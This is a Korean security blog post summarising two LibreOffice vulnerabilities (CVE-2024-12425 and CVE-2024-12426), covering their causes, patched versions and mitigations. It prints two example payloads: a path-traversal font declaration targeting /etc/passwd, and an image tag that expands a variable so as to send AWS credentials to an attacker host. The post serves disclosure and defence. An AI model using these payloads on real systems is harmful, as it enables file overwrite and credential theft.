LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data
LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data
Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation.
gbhackers.com
- 취약점 개요
- LibreOffice에서 발견된 CVE-2024-12425, CVE-2024-12426 두 가지 취약점이 악용될 경우, 공격자가 임의 파일 쓰기 및 민감한 데이터 탈취가 가능
- 해당 취약점은 데스크톱 사용자뿐만 아니라 서버 환경에서 헤드리스(Headless) 문서 처리를 수행하는 시스템에도 영향을 미칠 수 있음
- LibreOffice의 오픈문서(XML) 처리 방식과 환경 변수 확장 기능을 악용하여 공격이 수행됨
- CVE-2024-12425: 경로 탐색(Path Traversal)을 통한 임의 파일 쓰기
- 취약점 원인: LibreOffice가 OpenDocument XML 내 임베디드 폰트(Embedded Fonts) 처리 시 경로 탐색 문자열을 적절히 필터링하지 않음
- 공격 방식
- 공격자는 문서 내 악의적인 폰트 선언을 추가하여 LibreOffice의 임시 디렉터리 밖으로 파일을 쓰도록 유도
- 예제 코드
<style:font-face svg:font-family="../../../../../../../etc/passwd"> <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData> </style:font-face> - 결과적으로, 악성 문서를 열 경우 공격자가 특정 시스템 파일을 덮어쓸 수 있음
- 서버 환경에서 LibreOffice를 웹 애플리케이션 파일 및 구성 스크립트 조작에 활용할 가능성이 높음
- CVE-2024-12426: 변수 확장을 이용한 데이터 탈취(Data Exfiltration)
- 취약점 원인: LibreOffice에서 지원하는 vnd.sun.star.expand URI 스키마가 환경 변수 및 INI 파일 내용을 자동으로 확장
- 공격 방식
- 공격자는 LibreOffice가 외부 서버로 데이터를 유출하도록 유도하는 문서를 생성 가능
- 예제 코드
<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials"> - 위의 코드 실행 시, 사용자 환경 변수 내 포함된 AWS 인증 정보가 공격자 서버로 전송될 가능성 존재
- 추가적인 변수 확장을 통해 이메일 클라이언트 설정, 데이터베이스 파일(SQLite), WordPress 패스워드 리셋 토큰 등 민감한 정보를 탈취할 수 있음
- 공격자는 이러한 기법을 연쇄적으로 활용하여 광범위한 데이터 유출 가능
- 보안 권고
- LibreOffice는 해당 취약점을 해결하기 위해 다음 버전에서 보안 패치 적용
- LibreOffice 7.5.9 (커뮤니티 버전)
- LibreOffice 7.6.5 (커뮤니티 버전)
- LibreOffice 24.2.2 (엔터프라이즈 버전)
- 기업 및 조직에서 빠른 보안 패치 적용 필요
- 추가적인 보안 조치
- 의심스러운 문서 실행 제한: LibreOffice의 보안 설정에서 신뢰할 수 없는 매크로 및 임베디드 콘텐츠 실행 제한
- 서버 환경에서 LibreOffice 사용 시 접근 제어 강화
- 웹 서버 및 기타 시스템에서 LibreOffice를 사용하는 경우 파일 읽기/쓰기 권한 최소화
- 웹 애플리케이션과 분리된 샌드박스 환경에서 실행하도록 설정
- 의심스러운 파일 확장자 차단
- LibreOffice 문서 내 포함된 임베디드 요소(폰트, 이미지 등)에 대한 보안 검토 필요
- 로그 모니터링 및 이상 접근 탐지
- 문서 열람 시 외부 서버로 데이터가 전송되지 않는지 모니터링
- 시스템 내 비정상적인 파일 변경 및 접근 로그 분석
- LibreOffice는 해당 취약점을 해결하기 위해 다음 버전에서 보안 패치 적용
- 결론
- CVE-2024-12425 및 CVE-2024-12426 취약점은 LibreOffice를 이용한 문서 기반 공격을 가능하게 하며, 특히 서버 환경에서는 더욱 위험
- 기업 및 개인 사용자 모두 LibreOffice 최신 보안 패치 적용이 필수적
- LibreOffice 문서 내 포함된 임베디드 콘텐츠 및 환경 변수 확장을 제한하고, 서버 환경에서의 접근 통제를 강화하는 보안 조치 필요
'Kant's IT > Vulnerability' 카테고리의 다른 글
| ChatGPT 운영자 프롬프트 인젝션 취약점으로 인한 개인정보 유출 (0) | 2025.02.28 |
|---|---|
| Xerox VersaLink C7025 복합기 취약점 분석 및 대응 방안 (0) | 2025.02.27 |
| Juniper Session Smart Router 인증 우회 취약점 대응 방안 (0) | 2025.02.27 |
| OpenSSH 취약점으로 인한 MITM 및 서비스 거부 공격 대응 방안 (0) | 2025.02.27 |
| Atlassian 제품의 Confluence 및 Crowd 주요 취약점 패치 발표 (0) | 2025.02.24 |